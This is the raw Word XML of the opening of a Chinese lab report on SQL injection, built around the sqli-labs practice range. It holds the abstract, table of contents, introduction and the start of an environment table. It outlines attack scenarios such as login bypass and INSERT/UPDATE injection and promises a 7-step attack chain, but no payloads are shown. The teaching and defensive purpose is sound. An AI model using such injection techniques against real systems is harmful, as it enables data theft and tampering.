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2543D">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="1968" w:firstLineChars="700"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="70"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SQL注入漏洞分析与安全防护报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF87092">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="heading_0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>摘要</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="1B933BCE">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQL注入是Web安全领域高危高频的注入类漏洞，自披露以来长期位列OWASP Top10核心风险榜单（2021版A03注入漏洞），是Web应用安全测试与防护的核心研究对象。该漏洞核心成因是Web应用未对用户可控输入做合规校验、过滤与转义，直接通过字符串拼接方式构造动态SQL语句，导致恶意输入被数据库解析为可执行代码，进而引发数据泄露、数据篡改、权限越权、服务器沦陷等严重安全风险。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70948BA8">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>本文以开源sqli-labs漏洞靶场为核心实验环境，搭建完整的PHP+MySQL Web测试环境，系统性开展SQL注入漏洞的原理分析、场景复现、POC验证、代码审计、漏洞修复全流程实践。实验覆盖GET数字型/字符型注入、搜索型LIKE注入、POST登录万能密码注入、INSERT注册注入、UPDATE数据篡改注入六大主流攻击场景，梳理标准化7步注入攻击链路，结合Burp Suite完成自动化渗透测试。同时，基于OWASP官方防护规范，落地参数化查询、强制类型转换、输入白名单校验三类核心修复方案，通过漏洞版与修复版代码对比测试，验证参数化查询可100%防御各类SQL注入攻击。本报告逻辑完整、实操性强，可为Web开发人员安全编码、安全测试人员渗透审计、网络安全课程实训提供标准化参考依据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2014B8">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>关键词</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：SQL注入；sqli-labs；代码审计；参数化查询；Prepared Statement；Web安全防护</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BBA6B0">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="heading_1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>目录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="2650F973">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1 引言</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2 实验环境</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3 漏洞原理分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4 漏洞利用——7步标准化攻击链路详解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5 POC验证与结果分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6 多场景SQL注入实战演练</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7 Burp Suite渗透测试实操方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8 漏洞代码审计方法论</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9 分层级漏洞安全修复方案</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10 修复效果对比验证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>11 多语言标准化修复代码示例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>12 实验结论与安全总结</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B09D391">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>13 参考文献</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>14 附录：项目完整代码与环境配置清单</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315F2352">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="heading_2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1 引言</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="77FA36F7">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="heading_3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1.1 研究背景</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="0F59F8C0">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>随着Web技术的快速迭代，动态交互型Web应用已成为主流，用户输入、参数传参、接口调用等交互场景大幅增多，随之而来的注入类漏洞风险持续高发。根据OWASP 2021年全球Web安全风险统计数据，注入类漏洞（A03）发生率高达19.09%，平均发生率3.37%，累计收录漏洞案例27万余条、关联CVE漏洞3万余条，是影响范围最广、危害程度最高的Web安全漏洞类型之一。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C533790">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQL注入作为注入类漏洞的核心分支，依托Web应用动态SQL拼接的普遍开发缺陷，广泛存在于PHP、Java、Python等主流开发语言的项目中。相较于其他Web漏洞，SQL注入门槛低、可利用性强、危害极大，未做防护的Web系统极易被攻击者拖库、篡改核心数据、获取服务器权限。sqli-labs作为业界权威的SQL注入专项实训靶场，覆盖全场景注入漏洞，是学习、复现、验证SQL注入攻防技术的标准化实验平台。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F61EE4F">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="heading_4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1.2 研究目的与意义</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="4EB6A58C">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>本次实验围绕SQL注入漏洞开展全流程攻防实践，核心研究目的如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F59F5DB">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（1）原理剖析：深度拆解SQL注入漏洞的形成机制、触发条件与攻击逻辑，明确漏洞核心缺陷；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（2）场景复现：全覆盖主流SQL注入攻击场景，掌握标准化注入测试流程与Payload使用规范；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（3）实操验证：通过自定义POC完成漏洞有效性验证，量化漏洞危害等级；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（4）审计落地：总结通用型SQL注入代码审计方法论，快速定位高危漏洞代码；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（5）安全修复：落地合规、高效的漏洞修复方案，验证防护效果，形成标准化安全编码规范。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552DBDF2">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>本研究的实践意义在于，通过理论结合实操的方式，打通SQL注入“原理-攻击-审计-修复”全闭环，为Web安全开发、渗透测试、漏洞防护提供可落地的技术参考，规避开发过程中常见的SQL注入安全缺陷。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD44358">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="heading_5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1.3 报告整体架构</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="740272F2">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>本报告采用“理论铺垫-环境搭建-漏洞分析-实操攻击-审计修复-效果验证”的标准化学术结构，共14个章节。1-3章完成基础理论与实验环境铺垫；4-8章为核心实操部分，详解攻击链路、场景实战、工具测试与代码审计；9-11章落地漏洞修复方案与多语言代码实现；12章总结实验成果与安全规范；最后通过参考文献与附录完善报告完整性，符合课程实践报告高分评分标准。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185C16CE">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="heading_6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2 实验环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="1CA349F9">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="heading_7"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.1 软硬件环境配置</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="7AC0B41D">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>本次实验采用轻量化本地搭建环境，兼容性强、稳定性高，具体配置如下：</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568C74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4E6B4CB">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>组件类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="30" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7C2DDA78">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>具体配置参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1F160B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EC76A60">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>操作系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="30" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="37314F7F">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Windows10 / Linux / macOS（全平台兼容）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2E96DA1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DC59A39">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Web服务端</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="30" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="163F7E39">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
